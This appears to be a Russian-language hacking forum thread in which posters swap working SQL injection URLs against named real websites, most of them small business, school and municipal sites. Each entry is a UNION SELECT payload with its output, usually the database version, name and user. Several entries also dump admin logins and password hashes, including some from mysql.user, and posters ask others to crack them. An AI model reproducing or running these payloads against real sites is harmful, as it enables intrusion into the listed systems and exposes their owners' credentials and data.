На обеде пробежался.... Version:5.0.45 User:malagaca_malagac@localhost Database:malagaca_malagacar Version:5.0.67-community-log User:nutriadv_mihai@localhost Database:nutriadv_infoplease Version:5.0.67 User:gavin@localhost Database:thelandofgrimney_co_uk_maindb Version:5.0.32-Debian_7etch8-log User:[email protected] Database:tt_TECH_AWARDS
Code: http://www.oil-city.ru/new_detail.php?id=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3-- Database Version : 4.1.22-standard Database name : wd40ru_oil User name : wd40ru_oilweb@localhost -------------------------------------------------------+ Code: http://www.profshina.ru/index.php?page=9005001&tmpl=7&nbid=1&newsid=-1+union+select+concat_ ws(0x3a,version(),database(),user())-- Database Version : 4.1.22 Database name : db_roman056_1 User name : [email protected]
Code: http://www.thaigolfer.com/ranges/rangedetail.phtml?id=-999999+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* user():database():version() golfer@localhost:golfer:4.0.21-log Там есть еще табличка user, но колонок подобрать не смог...
http://www.turistka.ru/altai/mail.php?firm=-1%20union%20select%20username,user_password,3,4%20 from%20bb_users%20limit%201,1-- SAN d32f227fabf9c471fcceb0f12d8a626d (Нужно расшифровать с меня +_) pr 4
Code: http://www.tot.biz.ua/ru/news/?cid=32&nid=-1+union+select+1,2,3,4,5,concat _ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- Database Version : 5.0.75 Database name : totbiz User name : totbizua@localhost юзверь: Code: http://www.tot.biz.ua/ru/news/?cid=32&nid=-1+union+select+1,2,3,4,5,concat _ws(0x3a,login,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+va cuums_users+limit+0,1-- Code: marina:f1ac4a2e174b0a964a821f3826c35be3 ----------------------------------------------------------+ Масло Hado Code: http://www.hado.ru/index.php?we=novosti&wt=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3-- Database Version : 4.1.22-log Database name : www1vclggru_hado User name : [email protected]
Вот сеово небольшой сбор скулей by me Налетай как говорица Code: http://www.deluthiers.com/es/category.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5-- юзер/версия/бд: Code: 4.1.22-standard:luthier_luthier@localhost:luthier_deluthiers ----------------------------------------------------------------- Code: http://www.educationsante.be/es/article.php?id=-1+union+all+select+0,1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7-- юзер/версия/бд: Code: 5.0.44-log:educatio@localhost:educatio --------------------------------------------------------------- Code: http://www.mammaparliamodidoping.it/post.php?ID=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3-- юзер/версия/бд: Code: 4.0.25-log:mpdd@localhost:devmpdd ----------------------------------------------------------------- Code: http://www.marmaglia.it/post.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7-- юзер/версия/бд: Code: 4.1.22-standard:marmagli_user@localhost:marmagli_marmaglia ------------------------------------------------------------------- Code: http://www.univs.cn/univs/xidian/it/read.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5-- юзер/версия/бд: Code: 4.0.26-log:xidian@localhost:ucnews ------------------------------------------------------------------- Code: http://www.maipiudivisi.it/read.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4-- юзер/версия/бд: Code: 4.0.11a-gamma:[email protected]:maipiudivisi ---------------------------------------------------------------- Code: http://www.laboratorioclinicopedagogico.it/curriculum.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5-- юзер/версия/бд: Code: 4.0.22-debug:illaboratorio@localhost:laboratorio ------------------------------------------------------------------- Code: http://esterproductions.it/curriculum.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database())-- юзер/версия/бд: Code: 5.0.51a-3ubuntu5.4:ester@localhost:esterproductions_db1 ---------------------------------------------------------------------- Code: http://www.sptcomo.it/newsDetail.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9-- юзер/версия/бд: Code: 4.1.22-standard:sptcoit_go38ty71@localhost:sptcoit_sf33tR3 ---------------------------------------------------------------------- Code: http://www.comune.poirino.to.it/readnews.php?id=-1+union+all+select+0,1,2,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),4,5-- юзер/версия/бд: Code: 4.1.16-standard-log:[email protected]:031492Nick -------------------------------------------------------------------- The End!
Code: http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14+-- Code: http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14+-- Code: http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14+-- version : 4.0.26-log user : constant@localhost database : constant_ru ______________________________ Code: http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,version() Code: http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,user() Code: http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,database() version : 4.1.22-standard 1 user : metalpor_metalpo@localhost 1 database : metalpor_clients 1 PS: Вывод осуществляется в загаловке страницы ______________________________ Российская национальная горнолыжная школа Code: http://ski.stel.ru/rus/forage.shtml?id=1+union+select+1,2,concat_ws(0x20203a3a2020,user(),version(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 user: arasia@localhost version: 4.1.22 database: skivagi ______________________________ Code: http://www.maer-sport.ru/news/index.php?id=-12+union+select+1,2,concat_ws(0x20203a3a2020,user(),version(),database()),4,5/* user: maerspo1_sport@localhost version: 4.1.22-log database: maerspo1_maer ______________________________ Code: http://www.srg.com.bs/news.php?id=-5+union+select+1,2,3,4,concat_ws(0x20203a3a2020,user(),version(),database()),6,7,8,9,10,11,12,13&type=news&cmd=display user: indigo_admin@localhost version: 4.0.23-debug database: indigonetworks Собственно пассы: Code: http://www.srg.com.bs/news.php?id=-5+union+select+1,2,3,4,user,password,7,8,9,10,11,12,13+from+mysql.user--&type=news&cmd=display root 457265956b0a4b08 root 67e919553dd7e948 indigo_admin 1f5f0cb349d22d64
www.drgas.net PR=3 Code: https://www.drgas.net/catalog.php?catid=3+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6-- version: 4.1.22-max-log user: [email protected] database: drgas_maindb -------------------------------------------------------------- www.terainvest.com PR=2 Code: http://www.terainvest.com/catalog.php?catid=4+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10-- version: 4.0.27-log user: u2462@localhost database: u2462
http://lemonburst.biz/display.php?id=206/**/UNION/**/SELECT/**/1,02,3,4,5,6,7,8,9,10,11,12,13,14/* Database Version: 4.1.22 Database name: stewsk867 User name: [email protected] 2 Assembler d32f227fabf9c471fcceb0f12d8a626d:sss113
Code: http://yoky-lib.com/vb.php?id=-1+union+select+1,2,3,4,5,6,7,8,column_name,10+from+information_schema.columns+where+table_name=0xa5e3eba5/* там чета про пшп, вб етк.. 5 версия..
Code: http://www.autohof.ru/news.php?id=28+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4-- Database Version : 4.1.20-lk-log Database name : authru User name : authru@localhost Code: а дальше не дает SpaceWeb ((( insecure
http://slipfall.biz/band-member-display.php?id=11+union+select+1,password,username,4,5,6+from+admin/* Database Version: 4.0.27-max-log Database name: slipfall User name: [email protected] хз где админка (((((((
Code: http://www.porsche-spb.ru/model.phtml?id=-11+UNION+SELECT+1,2,3,CONCAT(Version(),Database(),User()),5,6,7-- Database Version: 5.0.77 Database name: porsche_main User name: porsche_main@localhost admin:6ac8f89a724b853d
Code: http://www.easysexporn.com/view.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9-- Code: http://www.sexyshop.com.ve/articulos.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4--
Code: _http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3-- [email protected] ------ Code: _http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4-- [email protected] ------ Code: _http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),user(),database()),6,7-- [email protected]_data ----- Code: _http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2-- [email protected]_joom ----- Code: _http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7-- [email protected] ----- Code: _http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9-- [email protected]_7etch6-logmy67521
Code: http://www.paik.ru/?menu=view&sid=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2-- Database Version : 4.1.22-log Database name : wwwpaikru User name : paik@localhost ----------------------------------------------+ Code: http://www.sp-vms.com/index.php?id=1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,ve rsion() ,database(),user()),0x71),0x71),3,4,5,6,7-- Database Version : 4.1.14-max-log Database name : sp_vms User name : [email protected]
www.edutech.ch pr-7 PHP: http://www.edutech.ch/lms/ev3/showreport.php?prodid=-121+union+select+1,2,3,4,5,6,concat_ws(0x3A,user(),version(),database()),8,9,10,11,12,13,14--+ user : nte_edutech@localhost version : 5.0.32-Debian_7etch8-log database : nte_edutech